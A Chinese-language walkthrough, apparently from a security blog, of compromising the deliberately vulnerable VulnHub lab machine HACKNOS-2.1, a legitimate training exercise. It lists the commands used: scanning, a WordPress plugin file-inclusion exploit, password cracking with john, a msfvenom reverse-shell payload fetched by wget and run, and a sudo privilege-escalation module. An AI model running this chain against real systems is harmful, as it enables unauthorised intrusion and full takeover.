vulnhub靶机练习-HACKNOS-2.1

admin 2021年9月29日22:40:06vulnhub靶机练习-HACKNOS-2.1已关闭评论163 views字数 2080阅读6分56秒阅读模式

OS-HACKNOS-2.1

靶机安装

先把靶机设为NAT模式,开机时一直按shift,然后按e

image-20210822153841098

把框内的东西改成rw singke init=/bin/bash,然后ctrl+x进入界面,ip a看一下当前网卡是ens33

image-20210822153949802

1
2
3
4
5
cd /etc/netplan/
ls
cat *.yaml 这里看自己具体情况
把配置的的网卡改成当前的网卡
netplan apply

image-20210822154124677

信息搜集

nmap -sn 192.168.169.0/24 扫描当前网段得知靶机ip是192.168.169.141

nmap -sV -sC -A 192.168.169.141

image-20210822101338138

发现目标开启了80 22端口,我们访问一下80端口看看有什么内容,这里访问完以后是Apache2 Ubuntu Default Page,估计网站首页是在某个目录下,我们来扫一波目录

gobuster dir -u http://192.168.169.141/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

奇怪的是使用这个字典跑不出来,换一个尝试一下

gobuster dir -u http://192.168.169.141/ -w /usr/share/wordlists/dirb/big.txt

image-20210822101827989

扫描到了/tsweb目录,我们访问一下看看,使用一下这个插件,发现他是WordPress5.3的版本,这就可以使用wpscan来看看

image-20210822101909211

wpscan –url http://192.168.169.141/tsweb -e vp –api-token TOKEN 这里-e是枚举,vp是易受攻击的插件选项

image-20210822103931415

他是有漏洞的,CVE-2019-9618好像是,wpscan也给了文章,来看看这个https://www.exploit-db.com/exploits/46537,并且给出了poc

image-20210822104201163

漏洞挖掘

这是个本地文件包含漏洞,我们使用一下poc来看看是不是能够访问

image-20210822104321938

flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash

我们来解密试试,这里把我们要解密的东西丢到一个文件里,然后使用john解密,字典在/var/share/wordlists/下,rockyou.txt,首次使用需要进行解压,解压命令 gzip -d rockyou.txt.gz

破解命令 john –format=md5crypt –wordlist=/usr/share/wordlists/rockyou.txt 666 这里666是自己创建的文件的名字

image-20210822124451419

我们这里就直接知道了flag的账号密码,可以ssh登陆,ssh [email protected],登陆成功

image-20210822124654454

后渗透提权

我们可以查看一下存在的用户,cat /etc/passwd|grep bash,顺便切换成bash

image-20210822124951829

接下来在/var/backups/passbkp下翻到了一个md5-hash文件,是除了flag和root用户之外的用户的密码

继续解密试试,解密方法依旧是和上面那个一样,这里直接给出吧,然后切换到这个用户

image-20210822130511227

接下来就是来到他的主目录,获取user.txt下的内容

image-20210822130747783

这里还是老方法,使用msf的suggester模块,来进行提权,非常的舒服,具体可以见上一个DomDom靶机的提权,这里直接给出命令

1
2
3
4
5
6
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.169.134 LPORT=4444 -f elf > payload.elf
msfconsole
use exploit/multi/handler
payload payload/linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.169.134
run

生成好msf马以后,在目标本机开启 python -m SimpleHTTPServer 然后进入到靶机的tmp目录下

1
2
3
4
cd /tmp
wget http://192.168.169.140:8000/payload.elf
chmod payload.elf 777
./payload.elf

这样就可以获得到一个meterpreter,然后background记住此时的session

1
2
3
post/multi/recon/local_exploit_suggester
set SESSION 1
run

image-20210822132441333

这里我选择了第二个exp,第一个用了打不通

1
2
3
4
use exploit/linux/local/sudo_baron_samedit
show options
set SESSION 1
run

image-20210822132543809

成功获取了root权限,cat /root/root.txt,听懂掌声

image-20210822132732478

相关推荐: 中国菜刀20160620初体验

6月17号,某牛在朋友圈发了消息:史上最牛逼的中国菜刀即将发布,过市面上所有的 waf,而且把 webshell 玩到让你瞠目结舌的境界当时有消息称 6 月底将会发布新版菜刀。果不其然,在 6 月 20 日,原本已经关闭的 maicaidao.com 又开放了…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月29日22:40:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub靶机练习-HACKNOS-2.1http://cn-sec.com/archives/560462.html